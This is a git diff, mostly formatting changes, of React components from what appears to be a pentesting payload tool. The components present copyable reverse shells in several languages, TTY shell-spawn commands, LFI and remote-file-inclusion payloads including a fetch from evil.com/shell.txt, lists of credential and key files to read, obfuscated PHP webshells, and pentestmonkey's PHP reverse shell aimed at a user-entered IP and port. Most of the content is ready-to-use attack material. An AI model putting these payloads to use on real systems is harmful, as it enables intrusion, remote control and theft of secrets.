</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(perl_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>
Python <IconFont type='icon-python' />
</Title>
<Paragraph code ellipsis={true}>
{python_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={python_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(python_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>
Ruby <IconFont type='icon-ruby' />
</Title>
<Paragraph code ellipsis={true}>
{ruby_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={ruby_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(ruby_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div style={{ padding: 15, marginTop: 15 }} key='g'>
<Title level={3}>
Telnet <IconFont type='icon-lvzhou_yuanchengTelnet' />
</Title>
<Paragraph code ellipsis={true}>
{telnet_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={telnet_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(telnet_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
</QueueAnim>
);
<Divider orientation='center'>PowerShell</Divider>
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Paragraph code ellipsis={true}>
{PS_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={PS_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( PS_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Divider orientation='center'>Perl</Divider>
<Paragraph code ellipsis={true}>
{perl_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={perl_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( perl_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider orientation='center'>Python</Divider>
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph code ellipsis={true}>
{python_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={python_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( python_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider orientation='center'>Ruby</Divider>
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph code ellipsis={true}>
{ruby_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={ruby_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( ruby_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider orientation='center'>Telnet</Divider>
<div style={{ padding: 15, marginTop: 15 }} key='g'>
<Paragraph code ellipsis={true}>
{telnet_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={telnet_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( telnet_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
</QueueAnim>
);
}

376
src/components/linux/TtySpawnShell.tsx
View File

@@ -4,192 +4,192 @@ import QueueAnim from 'rc-queue-anim';
const { Title, Paragraph } = Typography;
export default function TTY() {
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
TTY Spawn Shell
</Title>
<Paragraph style={{ margin: 15 }}>
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the
system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will
depend on the system environment and installed packages.
</Paragraph>
<div
key='a'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Python spawn shell </Title>
<Paragraph editable code copyable>
python -c 'import pty; pty.spawn("/bin/bash")'
</Paragraph>
</div>
<Divider orientation='center'>Fully Interactive TTY</Divider>
<div
key='b'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={4}>All the steps to stabilize your shell</Title>
<Paragraph>
<strong>The first step:</strong>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
python3 -c 'import pty;pty.spawn("/bin/bash")'
</Paragraph>
</pre>
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit
prettier, but we still wont be able to use tab autocomplete or the arrow keys.
</Paragraph>
<br />
<Paragraph>
<strong>Step two is:</strong>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
export TERM=xterm
</Paragraph>
</pre>
This will give us access to term commands such as clear.
</Paragraph>
<br />
<Paragraph>
<strong>Finally (and most importantly) we will background the shell using</strong>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
Ctrl + Z
</Paragraph>
</pre>
Back in our own terminal we use
<pre>
<Paragraph style={{ margin: 0 }} copyable>
stty raw -echo; fg
</Paragraph>
</pre>
This does two things: first, it turns off our own terminal echo which gives us access to tab
autocompletes, the arrow keys, and Ctrl + C to kill processes
</Paragraph>
<Paragraph>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
stty rows 38 columns 116
</Paragraph>
</pre>
</Paragraph>
</div>
<Divider />
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>OS system spawn shell</Title>
<Paragraph copyable code editable>
echo os.system("/bin/bash")
</Paragraph>
</div>
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Bash spawn shell </Title>
<Paragraph copyable code editable>
/bin/sh -i
</Paragraph>
</div>
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Perl spawn shell </Title>
<Paragraph copyable code editable>
perl e 'exec "/bin/sh";'
</Paragraph>
</div>
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Ruby spawn shell </Title>
<Paragraph copyable code editable>
ruby: exec "/bin/sh"
</Paragraph>
</div>
<div
key='g'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Lua spawn shell </Title>
<Paragraph copyable code editable>
lua: os.execute("/bin/sh")
</Paragraph>
</div>
<div
key='h'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>IRB spawn shell </Title>
<Paragraph copyable code editable>
exec "/bin/sh"
</Paragraph>
</div>
<div
key='i'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>VI spawn shell </Title>
<Paragraph copyable code editable>
:!bash
</Paragraph>
</div>
<div
key='j'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>VI(2) spawn shell </Title>
<Paragraph copyable code editable>
:set shell=/bin/bash:shell
</Paragraph>
</div>
<div
key='k'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Nmap spawn shell </Title>
<Paragraph copyable code editable>
!sh
</Paragraph>
</div>
</QueueAnim>
);
export default function TTY () {
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
TTY Spawn Shell
</Title>
<Paragraph style={{ margin: 15 }}>
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the
system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will
depend on the system environment and installed packages.
</Paragraph>
<div
key='a'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Python spawn shell </Title>
<Paragraph editable code copyable>
python -c 'import pty; pty.spawn("/bin/bash")'
</Paragraph>
</div>
<Divider orientation='center'>Fully Interactive TTY</Divider>
<div
key='b'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={4}>All the steps to stabilize your shell</Title>
<Paragraph>
<strong>The first step:</strong>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
python3 -c 'import pty;pty.spawn("/bin/bash")'
</Paragraph>
</pre>
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit
prettier, but we still wont be able to use tab autocomplete or the arrow keys.
</Paragraph>
<br />
<Paragraph>
<strong>Step two is:</strong>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
export TERM=xterm
</Paragraph>
</pre>
This will give us access to term commands such as clear.
</Paragraph>
<br />
<Paragraph>
<strong>Finally (and most importantly) we will background the shell using</strong>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
Ctrl + Z
</Paragraph>
</pre>
Back in our own terminal we use
<pre>
<Paragraph style={{ margin: 0 }} copyable>
stty raw -echo; fg
</Paragraph>
</pre>
This does two things: first, it turns off our own terminal echo which gives us access to tab
autocompletes, the arrow keys, and Ctrl + C to kill processes
</Paragraph>
<Paragraph>
<pre>
<Paragraph style={{ margin: 0 }} copyable>
stty rows 38 columns 116
</Paragraph>
</pre>
</Paragraph>
</div>
<Divider />
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>OS system spawn shell</Title>
<Paragraph copyable code editable>
echo os.system("/bin/bash")
</Paragraph>
</div>
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Bash spawn shell </Title>
<Paragraph copyable code editable>
/bin/sh -i
</Paragraph>
</div>
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Perl spawn shell </Title>
<Paragraph copyable code editable>
perl e 'exec "/bin/sh";'
</Paragraph>
</div>
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Ruby spawn shell </Title>
<Paragraph copyable code editable>
ruby: exec "/bin/sh"
</Paragraph>
</div>
<div
key='g'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Lua spawn shell </Title>
<Paragraph copyable code editable>
lua: os.execute("/bin/sh")
</Paragraph>
</div>
<div
key='h'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>IRB spawn shell </Title>
<Paragraph copyable code editable>
exec "/bin/sh"
</Paragraph>
</div>
<div
key='i'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>VI spawn shell </Title>
<Paragraph copyable code editable>
:!bash
</Paragraph>
</div>
<div
key='j'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>VI(2) spawn shell </Title>
<Paragraph copyable code editable>
:set shell=/bin/bash:shell
</Paragraph>
</div>
<div
key='k'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Nmap spawn shell </Title>
<Paragraph copyable code editable>
!sh
</Paragraph>
</div>
</QueueAnim>
);
}

478
src/components/web/LFI.tsx
View File

@@ -6,246 +6,246 @@ import Clipboard from 'react-clipboard.js';
const { Title, Paragraph } = Typography;
export default function LFI() {
const successInfoReverseShell = () => {
message.success('Your payload has been copied');
};
export default function LFI () {
const successInfoReverseShell = () => {
message.success( 'Your payload has been copied' );
};
const successInfoEncodeURL = () => {
message.success('Your payload URL encoded has been copied');
};
const successInfoEncodeURL = () => {
message.success( 'Your payload URL encoded has been copied' );
};
const directoryTraversal = `foo.php?file=../../../../../../../etc/passwd`;
const phpWrapperLfi = `/example1.php?page=expect://ls`;
const phpWrapperFilter = `/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd`;
const phpRfi = `http://example.com/index.php?page=http://evil.com/shell.txt`;
const linux = [
{ title: '/etc/passwd' },
{ title: '/etc/shadow' },
{ title: '/etc/issue' },
{ title: '/etc/group' },
{ title: '/etc/hostname' },
{ title: '/etc/ssh/ssh_config' },
{ title: '/etc/ssh/sshd_config' },
{ title: '/root/.ssh/id_rsa' },
{ title: '/root/.ssh/authorized_keys' },
{ title: '/home/user/.ssh/authorized_keys' },
{ title: '/home/user/.ssh/id_rsa' },
{ title: '/proc/[0-9]*/fd/[0-9]*' },
{ title: '/proc/mounts' },
{ title: '/home/$USER/.bash_history' },
{ title: '/home/$USER/.ssh/id_rsa' },
{ title: '/var/run/secrets/kubernetes.io/serviceaccount' },
{ title: '/var/lib/mlocate/mlocate.db' },
{ title: '/var/lib/mlocate.db' }
];
const apache = [
{ title: '/etc/apache2/apache2.conf' },
{ title: '/usr/local/etc/apache2/httpd.conf' },
{ title: '/etc/httpd/conf/httpd.conf' },
{ title: 'Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log' },
{ title: 'Debian/Ubuntu -> /var/log/apache2/access.log' },
{ title: 'FreeBSD -> /var/log/httpd-access.log' },
{ title: '/var/log/apache/access.log' },
{ title: '/var/log/apache/error.log' },
{ title: '/var/log/apache2/access.log' },
{ title: '/var/log/apache/error.log' }
];
const mysql = [
{ title: '/var/lib/mysql/mysql/user.frm' },
{ title: '/var/lib/mysql/mysql/user.MYD' },
{ title: '/var/lib/mysql/mysql/user.MYI' }
];
const windows = [
{ title: '/boot.ini' },
{ title: '/autoexec.bat' },
{ title: '/windows/system32/drivers/etc/hosts' },
{ title: '/windows/repair/SAM' },
{ title: '/windows/panther/unattended.xml' },
{ title: '/windows/panther/unattend/unattended.xml' },
{ title: '/windows/system32/license.rtf' },
{ title: '/windows/system32/eula.txt' }
];
const directoryTraversal = `foo.php?file=../../../../../../../etc/passwd`;
const phpWrapperLfi = `/example1.php?page=expect://ls`;
const phpWrapperFilter = `/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd`;
const phpRfi = `http://example.com/index.php?page=http://evil.com/shell.txt`;
const linux = [
{ title: '/etc/passwd' },
{ title: '/etc/shadow' },
{ title: '/etc/issue' },
{ title: '/etc/group' },
{ title: '/etc/hostname' },
{ title: '/etc/ssh/ssh_config' },
{ title: '/etc/ssh/sshd_config' },
{ title: '/root/.ssh/id_rsa' },
{ title: '/root/.ssh/authorized_keys' },
{ title: '/home/user/.ssh/authorized_keys' },
{ title: '/home/user/.ssh/id_rsa' },
{ title: '/proc/[0-9]*/fd/[0-9]*' },
{ title: '/proc/mounts' },
{ title: '/home/$USER/.bash_history' },
{ title: '/home/$USER/.ssh/id_rsa' },
{ title: '/var/run/secrets/kubernetes.io/serviceaccount' },
{ title: '/var/lib/mlocate/mlocate.db' },
{ title: '/var/lib/mlocate.db' }
];
const apache = [
{ title: '/etc/apache2/apache2.conf' },
{ title: '/usr/local/etc/apache2/httpd.conf' },
{ title: '/etc/httpd/conf/httpd.conf' },
{ title: 'Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log' },
{ title: 'Debian/Ubuntu -> /var/log/apache2/access.log' },
{ title: 'FreeBSD -> /var/log/httpd-access.log' },
{ title: '/var/log/apache/access.log' },
{ title: '/var/log/apache/error.log' },
{ title: '/var/log/apache2/access.log' },
{ title: '/var/log/apache/error.log' }
];
const mysql = [
{ title: '/var/lib/mysql/mysql/user.frm' },
{ title: '/var/lib/mysql/mysql/user.MYD' },
{ title: '/var/lib/mysql/mysql/user.MYI' }
];
const windows = [
{ title: '/boot.ini' },
{ title: '/autoexec.bat' },
{ title: '/windows/system32/drivers/etc/hosts' },
{ title: '/windows/repair/SAM' },
{ title: '/windows/panther/unattended.xml' },
{ title: '/windows/panther/unattend/unattended.xml' },
{ title: '/windows/system32/license.rtf' },
{ title: '/windows/system32/eula.txt' }
];
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
LFI
</Title>
<Paragraph style={{ margin: 15 }}>
LFI stands for Local File Includes - its a file local inclusion vulnerability that allows an attacker
to include files that exist on the target web server.
</Paragraph>
<Paragraph style={{ marginLeft: 15 }}>
Typically this is exploited by abusing dynamic file inclusion mechanisms that dont sanitize user input.
</Paragraph>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Title level={3}>Directory traversal</Title>
<Paragraph copyable code editable ellipsis={true}>
{directoryTraversal}
</Paragraph>
<Clipboard component='a' data-clipboard-text={directoryTraversal}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(directoryTraversal)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='b'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>PHP Wrapper php://file</Title>
<Paragraph copyable code editable ellipsis={true}>
{phpWrapperLfi}
</Paragraph>
<Clipboard component='a' data-clipboard-text={phpWrapperLfi}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(phpWrapperLfi)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>PHP Wrapper php://filter</Title>
<Paragraph copyable code editable ellipsis={true}>
{phpWrapperFilter}
</Paragraph>
<Clipboard component='a' data-clipboard-text={phpWrapperFilter}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(phpWrapperFilter)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>PHP Wrapper php://filter</Title>
<Paragraph copyable code editable ellipsis={true}>
{phpRfi}
</Paragraph>
<Clipboard component='a' data-clipboard-text={phpRfi}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(phpRfi)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Useful LFI files</Title>
<Title level={4}>Linux</Title>
{linux.map((k, i) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
})}
<Divider dashed />
<Title level={4}>Apache</Title>
{apache.map((k, i) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
})}
<Divider dashed />
<Title level={4}>MySQL</Title>
{mysql.map((k, i) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
})}
<Divider dashed />
<Title level={4}>Windows</Title>
{windows.map((k, i) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
})}
</div>
<Divider dashed />
</QueueAnim>
);
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
LFI
</Title>
<Paragraph style={{ margin: 15 }}>
LFI stands for Local File Includes - its a file local inclusion vulnerability that allows an attacker
to include files that exist on the target web server.
</Paragraph>
<Paragraph style={{ marginLeft: 15 }}>
Typically this is exploited by abusing dynamic file inclusion mechanisms that dont sanitize user input.
</Paragraph>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Title level={3}>Directory traversal</Title>
<Paragraph copyable code editable ellipsis={true}>
{directoryTraversal}
</Paragraph>
<Clipboard component='a' data-clipboard-text={directoryTraversal}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( directoryTraversal )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='b'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>PHP Wrapper php://file</Title>
<Paragraph copyable code editable ellipsis={true}>
{phpWrapperLfi}
</Paragraph>
<Clipboard component='a' data-clipboard-text={phpWrapperLfi}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( phpWrapperLfi )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>PHP Wrapper php://filter</Title>
<Paragraph copyable code editable ellipsis={true}>
{phpWrapperFilter}
</Paragraph>
<Clipboard component='a' data-clipboard-text={phpWrapperFilter}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( phpWrapperFilter )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>PHP Wrapper php://filter</Title>
<Paragraph copyable code editable ellipsis={true}>
{phpRfi}
</Paragraph>
<Clipboard component='a' data-clipboard-text={phpRfi}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the payload
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( phpRfi )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>Useful LFI files</Title>
<Title level={4}>Linux</Title>
{linux.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
} )}
<Divider dashed />
<Title level={4}>Apache</Title>
{apache.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
} )}
<Divider dashed />
<Title level={4}>MySQL</Title>
{mysql.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
} )}
<Divider dashed />
<Title level={4}>Windows</Title>
{windows.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider dashed />
</QueueAnim>
);
};

712
src/components/web/PhpReverseShell.tsx
View File

@@ -2,11 +2,11 @@ import React from 'react';
import PersistedState from 'use-persisted-state';
import { Input, Button, message, Typography, Row, Col, Divider, Collapse } from 'antd';
import {
CopyOutlined,
WifiOutlined,
DownloadOutlined,
ArrowsAltOutlined,
createFromIconfontCN
CopyOutlined,
WifiOutlined,
DownloadOutlined,
ArrowsAltOutlined,
createFromIconfontCN
} from '@ant-design/icons';
import QueueAnim from 'rc-queue-anim';
import Clipboard from 'react-clipboard.js';
@@ -16,38 +16,38 @@ import pretty from 'pretty';
const { Title, Paragraph } = Typography;
const { Panel } = Collapse;
const IconFont = createFromIconfontCN({
scriptUrl: [ './iconfont.js' ]
});
const IconFont = createFromIconfontCN( {
scriptUrl: [ './iconfont.js' ]
} );
export default function PhpReverseShell() {
const useIPv4State = PersistedState('ipv4_tcp_cache');
const [ values, setValues ] = useIPv4State({
ip: '',
port: ''
});
const handleChange = (name: string) => (event: { target: { value: string; }; }) => {
setValues({ ...values, [name]: event.target.value });
};
const successInfoReverseShell = () => {
message.success('Your reverse shell has been copied');
};
const oneLiner = `<?php system($_GET["cmd"]);?>`;
const shell_obfuscate =
`<?=$_="";$_="'" \;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=` +
"${$_}['_'^'o'];echo`$_`?>";
const shell_obfuscate_function =
`<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?>` + "<?=${'_'.$_}['_'](${'_'.$_}['__']);?>";
export default function PhpReverseShell () {
const useIPv4State = PersistedState( 'ipv4_tcp_cache' );
const [ values, setValues ] = useIPv4State( {
ip: '',
port: ''
} );
const handleChange = ( name: string ) => ( event: { target: { value: string; }; } ) => {
setValues( { ...values, [ name ]: event.target.value } );
};
const successInfoReverseShell = () => {
message.success( 'Your reverse shell has been copied' );
};
const oneLiner = `<?php system($_GET["cmd"]);?>`;
const shell_obfuscate =
`<?=$_="";$_="'" \;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=` +
"${$_}['_'^'o'];echo`$_`?>";
const shell_obfuscate_function =
`<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?>` + "<?=${'_'.$_}['_'](${'_'.$_}['__']);?>";
const phpReverseShell = `
const phpReverseShell = `
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '${values.ip}'; // You have changed this
$port = ${values.port}; // And this
$ip = '${ values.ip }'; // You have changed this
$port = ${ values.port }; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
@@ -188,331 +188,331 @@ export default function PhpReverseShell() {
?>
`;
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
PHP Reverse Shell
</Title>
<Paragraph style={{ margin: 15 }}>
Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to
obtain an interactive shell session on the target machine and continue their attack.
</Paragraph>
<div style={{ padding: 15 }}>
<Row gutter={{ xs: 8, sm: 16, md: 24, lg: 32 }}>
<Col span={12}>
<Input
maxLength={15}
prefix={<WifiOutlined />}
name='Ip adress'
placeholder='IP Address or domain (ex: 212.212.111.222)'
onChange={handleChange('ip')}
value={values.ip}
/>
</Col>
<Col span={12}>
<Input
maxLength={5}
prefix={<IconFont type='icon-Network-Plug' />}
name='Port'
placeholder='Port (ex: 1337)'
onChange={handleChange('port')}
value={values.port}
/>
</Col>
</Row>
</div>
<Divider orientation='center'>Pentestmonkey's reverse shell</Divider>
<div
key='a'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph>This script will make an outbound TCP connection to a hardcoded IP and port.</Paragraph>
<Collapse defaultActiveKey={[ '0' ]}>
<Panel header='View the souce code' key='1'>
<SyntaxHighlighter language='php' style={vs2015} showLineNumbers={true}>
{pretty(phpReverseShell)}
</SyntaxHighlighter>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15 }}>
<a
href='https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php'
target='_blank'
rel='noreferrer noopener'
>
<ArrowsAltOutlined style={{ marginRight: 10 }} />
Pentestmonkey's repository
</a>
</Button>
</Panel>
</Collapse>
<Button
type='primary'
